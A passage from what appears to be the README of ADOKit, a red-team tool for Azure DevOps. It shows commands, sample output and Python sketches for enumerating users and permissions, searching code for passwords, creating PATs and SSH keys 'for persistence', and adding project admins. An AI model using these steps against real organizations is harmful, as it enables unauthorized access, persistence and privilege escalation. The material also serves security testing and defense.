      ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listrepo
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/29/2023 8:41:50 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Name | URL
      -----------------------------------------------------------------------------------
      TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
      MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/SomeOtherRepo
      AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
      ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
      TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

      3/29/23 12:41:53 Finished execution of listrepo

      Search Repos

      Use Case

      Search for repositories by repository name in Azure DevOps instance

      Syntax

      Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

      ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

      ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

      Example Output

      C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

      ==================================================
      Module: searchrepo
      Auth Type: API Key
      Search Term: test
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/29/2023 9:26:57 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Name | URL
      -----------------------------------------------------------------------------------
      TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
      TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

      3/29/23 13:26:59 Finished execution of searchrepo

      List Projects

      Use Case

      Discover projects being used in Azure DevOps instance

      Syntax

      Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

      ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listproject
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 7:44:59 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Name | Visibility | URL
      -----------------------------------------------------------------------------------------------------
      TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
      MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
      TestProject | private | https://dev.azure.com/YourOrganization/TestProject

      4/4/23 11:45:04 Finished execution of listproject

      Search Projects

      Use Case

      Search for projects by project name in Azure DevOps instance

      Syntax

      Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

      ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

      ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

      Example Output

      C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

      ==================================================
      Module: searchproject
      Auth Type: API Key
      Search Term: map
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 7:45:30 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Name | Visibility | URL
      -----------------------------------------------------------------------------------------------------
      MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

      4/4/23 11:45:31 Finished execution of searchproject

      Search Code

      Use Case

      Search for code containing a given keyword in Azure DevOps instance

      Syntax

      Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

      ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

      ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

      Example Output

      C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

      ==================================================
      Module: searchcode
      Auth Type: Cookie
      Search Term: password
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/29/2023 3:22:21 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
      |_ Console.WriteLine("PassWord");
      |_ this is some text that has a password in it

      [>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
      |_ Console.WriteLine("PaSsWoRd");

      [*] Match count : 3

3/29/23 19:22:22 Finished execution of searchcode
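Code search in Azure DevOps is exposed through the documented Search REST API on the almsearch host. The sketch below is an approximation of what a searchcode-style module performs, not ADOKit's actual code; the organization, PAT, and paging values are placeholders.

import requests

ORG = "organizationName"  # placeholder
PAT = "apiKey"            # placeholder

resp = requests.post(
    f"https://almsearch.dev.azure.com/{ORG}/_apis/search/codesearchresults"
    "?api-version=7.1-preview.1",
    auth=("", PAT),
    json={"searchText": "password", "$skip": 0, "$top": 25},
)
resp.raise_for_status()
for hit in resp.json()["results"]:
    print(hit["project"]["name"], hit["repository"]["name"], hit["path"])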

      Search Files

      Use Case

Search repositories for files whose names contain a given keyword in an Azure DevOps instance

      Syntax

      Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

      ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

      ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

      Example Output

      C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

      ==================================================
      Module: searchfile
      Auth Type: Cookie
      Search Term: test
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/29/2023 11:28:34 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      File URL
      ----------------------------------------------------------------------------------------------------
      https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.cs
      https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs

      3/29/23 15:28:37 Finished execution of searchfile
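File-name matching like this can be reproduced with the documented Git REST API by enumerating repositories and walking each repository's item tree; whether ADOKit implements it this way is an assumption. A sketch with placeholder values (collection-level repository listing is assumed to be visible to the caller, and empty repositories may return errors a robust version would handle):

import requests

ORG_URL = "https://dev.azure.com/organizationName"  # placeholder
PAT = "apiKey"                                      # placeholder
KEYWORD = "test"

repos = requests.get(f"{ORG_URL}/_apis/git/repositories?api-version=7.1-preview.1",
                     auth=("", PAT)).json()["value"]
for repo in repos:
    items = requests.get(
        f"{ORG_URL}/{repo['project']['name']}/_apis/git/repositories/"
        f"{repo['id']}/items?recursionLevel=Full&api-version=7.1-preview.1",
        auth=("", PAT),
    ).json().get("value", [])
    for item in items:
        if item.get("isFolder"):
            continue
        # Compare the keyword against the file-name portion of each path.
        if KEYWORD.lower() in item["path"].rsplit("/", 1)[-1].lower():
            print(f"{repo['webUrl']}?path={item['path']}")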

      Create PAT

      Use Case

      Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.

      Syntax

Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, valid-until date, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The PAT will be valid until 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

      ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: createpat
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/31/2023 2:33:09 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      PAT ID | Name | Scope | Valid Until | Token Value
      ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

      3/31/23 18:33:10 Finished execution of createpat
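The public analogue of this persistence technique is the documented PAT Lifecycle Management API. Note that this documented endpoint requires an Azure AD (Entra ID) access token rather than the cookie ADOKit uses, so the sketch below is an approximation of the operation, not ADOKit's internal call; the token value and display name are placeholders.

import requests
from datetime import datetime, timedelta, timezone

ORG = "organizationName"  # placeholder
AAD_TOKEN = "eyJ..."      # placeholder Azure AD bearer token

# One year out, mirroring the maximum lifetime noted above.
valid_to = (datetime.now(timezone.utc) + timedelta(days=365)).strftime("%Y-%m-%dT%H:%M:%SZ")
resp = requests.post(
    f"https://vssps.dev.azure.com/{ORG}/_apis/tokens/pats?api-version=7.1-preview.1",
    headers={"Authorization": f"Bearer {AAD_TOKEN}"},
    json={"displayName": "ADOKit-example", "scope": "app_token",
          "validTo": valid_to, "allOrgs": False},
)
resp.raise_for_status()
pat = resp.json()["patToken"]
print(pat["authorizationId"], pat["displayName"], pat["validTo"], pat["token"])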

      List PATs

      Use Case

List all personal access tokens (PATs) for a given user in an Azure DevOps instance.

      Syntax

Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and valid-until date for all of the user's active PATs.

      ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listpat
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 3/31/2023 2:33:17 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      PAT ID | Name | Scope | Valid Until
      -------------------------------------------------------------------------------------------------------------------------------------------
      9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

      3/31/23 18:33:18 Finished execution of listpat

      Remove PAT

      Use Case

      Remove a PAT for a given user in an Azure DevOps instance.

      Syntax

Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed, and then list the user's remaining active PATs.

      ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

      ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

      Example Output

      C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

      ==================================================
      Module: removepat
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 11:04:59 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

      PAT ID | Name | Scope | Valid Until
      -------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM

      4/3/23 15:05:00 Finished execution of removepat
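Against the same documented PAT Lifecycle API, removal is a DELETE keyed by authorizationId, and re-listing afterwards mirrors removepat's output. As above, the documented endpoint wants an Azure AD bearer token rather than ADOKit's cookie, and the target ID below is a placeholder.

import requests

ORG = "organizationName"  # placeholder
AAD_TOKEN = "eyJ..."      # placeholder Azure AD bearer token
TARGET_ID = "0b20ac58-fc65-4b66-91fe-4ff909df7298"  # placeholder PAT ID
BASE = f"https://vssps.dev.azure.com/{ORG}/_apis/tokens/pats"
HDRS = {"Authorization": f"Bearer {AAD_TOKEN}"}

requests.delete(f"{BASE}?authorizationId={TARGET_ID}&api-version=7.1-preview.1",
                headers=HDRS).raise_for_status()

# List what remains, mirroring removepat's post-removal listing.
for tok in requests.get(f"{BASE}?api-version=7.1-preview.1",
                        headers=HDRS).json()["patTokens"]:
    print(tok["authorizationId"], tok["displayName"], tok["validTo"])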

      Create SSH Key

      Use Case

      Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.

      Syntax

Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, valid-until date, and the last 20 characters of the public SSH key for the key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The SSH key will be valid until 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

      ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

      Example Output

      C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

      ==================================================
      Module: createsshkey
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 2:51:22 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      SSH Key ID | Name | Scope | Valid Until | Public SSH Key
      -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
      fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

      4/3/23 18:51:24 Finished execution of createsshkey

      List SSH Keys

      Use Case

      List all public SSH keys for a given user in an Azure DevOps instance.

      Syntax

Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH key ID, name, scope, and valid-until date for all of the user's active SSH keys, along with the last 20 characters of each public SSH key.

      ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listsshkey
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 11:37:10 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      SSH Key ID | Name | Scope | Valid Until | Public SSH Key
      -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
      ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

      4/3/23 15:37:11 Finished execution of listsshkey

      Remove SSH Key

      Use Case

      Remove an SSH key for a given user in an Azure DevOps instance.

      Syntax

Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether the SSH key was removed, and then list the user's remaining active SSH keys.

      ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

      ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

      Example Output

      C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

      ==================================================
      Module: removesshkey
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 1:50:08 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.


      [+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

      SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
      ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

      4/3/23 17:50:09 Finished execution of removesshkey

      List Users

      Use Case

      List users within an Azure DevOps instance

      Syntax

      Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

      ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listuser
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 4:12:07 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Username | Display Name | UPN
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
      user1 | User 1 | user1@YourOrganization.onmicrosoft.com
      jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
      rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
      user2 | User 2 | user2@YourOrganization.onmicrosoft.com

      4/3/23 20:12:08 Finished execution of listuser
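User enumeration corresponds to the documented Graph Users REST API on the vssps host. A minimal sketch, assuming the requests package; the organization and PAT are placeholders, and the directoryAlias field is not guaranteed for every subject type.

import requests

ORG = "organizationName"  # placeholder
PAT = "apiKey"            # placeholder

resp = requests.get(
    f"https://vssps.dev.azure.com/{ORG}/_apis/graph/users?api-version=7.1-preview.1",
    auth=("", PAT),
)
resp.raise_for_status()
for user in resp.json()["value"]:
    print(user.get("directoryAlias"), user["displayName"], user["principalName"])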

      Search User

      Use Case

Search for given user(s) in an Azure DevOps instance

      Syntax

      Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

      ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

      ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

      Example Output

      C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

      ==================================================
      Module: searchuser
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 4:12:23 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Username | Display Name | UPN
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
      user2 | User 2 | user2@YourOrganization.onmicrosoft.com

      4/3/23 20:12:24 Finished execution of searchuser

      List Groups

      Use Case

      List groups within an Azure DevOps instance

      Syntax

Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name, and description of each group.

      ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

      ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

      Example Output

      C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

      ==================================================
      Module: listgroup
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 4:48:45 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      UPN | Display Name | Description
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
      [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
      [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
      [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
      [TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
      [YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
      [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


      ---SNIP---

      4/3/23 20:48:46 Finished execution of listgroup
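Group enumeration maps to the documented Graph Groups REST API. The sketch below assumes the requests package and placeholder credentials; large organizations page results via a continuation-token response header, which this sketch ignores.

import requests

ORG = "organizationName"  # placeholder
PAT = "apiKey"            # placeholder

resp = requests.get(
    f"https://vssps.dev.azure.com/{ORG}/_apis/graph/groups?api-version=7.1-preview.1",
    auth=("", PAT),
)
resp.raise_for_status()
for group in resp.json()["value"]:
    print(group["principalName"], group["displayName"], group.get("description"))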

      Search Groups

      Use Case

Search for given group(s) in an Azure DevOps instance

      Syntax

Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name, and description for each matching group.

      ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

      ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

      Example Output

      C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

      ==================================================
      Module: searchgroup
      Auth Type: API Key
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/3/2023 4:48:41 PM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      UPN | Display Name | Description
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
      [TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
      [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
      [ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
      [MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
      [TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

      4/3/23 20:48:42 Finished execution of searchgroup

      Get Group Members

      Use Case

      List all group members for a given group

      Syntax

Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of each matching group, along with that group's members, including each member's mail address and display name.

      ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

      ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

      Example Output

      C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

      ==================================================
      Module: getgroupmembers
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 9:11:03 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
      [TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
      [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
      [MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
      [TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
      [TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
      [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
      [ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
      [MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

      4/4/23 13:11:09 Finished execution of getgroupmembers
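Membership expansion like this corresponds to the documented Graph Memberships API: query a group's descriptor downward, then resolve each member descriptor. A sketch with placeholder values; the group descriptor would first be obtained from a groups listing such as the one sketched above, and members are assumed to be users here (nested groups would need their own lookup).

import requests

ORG = "organizationName"                   # placeholder
PAT = "apiKey"                             # placeholder
GROUP_DESCRIPTOR = "vssgp.Uy0xLTktMTU..."  # placeholder group descriptor
VSSPS = f"https://vssps.dev.azure.com/{ORG}/_apis/graph"

memberships = requests.get(
    f"{VSSPS}/memberships/{GROUP_DESCRIPTOR}?direction=down&api-version=7.1-preview.1",
    auth=("", PAT),
).json()["value"]

for m in memberships:
    member = requests.get(
        f"{VSSPS}/users/{m['memberDescriptor']}?api-version=7.1-preview.1",
        auth=("", PAT),
    ).json()
    print(member.get("mailAddress"), member.get("displayName"))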

      Get Project Permissions

      Use Case

      Get a listing of who has permissions to a given project.

      Syntax

Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name, and description for each group that has permissions to the project. Additionally, this will output the members of each of those groups.

      ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

      ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

      Example Output

      C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

      ==================================================
      Module: getpermissions
      Auth Type: Cookie
      Search Term:
      Target URL: https://dev.azure.com/YourOrganization

      Timestamp: 4/4/2023 9:11:16 AM
      ==================================================


      [*] INFO: Checking credentials provided

      [+] SUCCESS: Credentials provided are VALID.

      UPN | Display Name | Description
      ------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
      [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
      [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
      [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
      [MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
      [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.


[*] INFO: Listing group members for each group that has permissions to this project



      GROUP NAME: [MaraudersMap]\Build Administrators

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


      GROUP NAME: [MaraudersMap]\Contributors

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributors | user1@YourOrganization.onmicrosoft.com | User 1
      [MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2


      GROUP NAME: [MaraudersMap]\MaraudersMap Team

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


      GROUP NAME: [MaraudersMap]\Project Administrators

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


      GROUP NAME: [MaraudersMap]\Project Valid Users

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


      GROUP NAME: [MaraudersMap]\Readers

      Group | Mail Address | Display Name
      --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
      [MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith

      4/4/23 13:11:18 Finished execution of getpermissions

      Add Project Admin

      Use Case

      Add a user to the Project Administrators group for a given project.

      Syntax

Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.

      ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
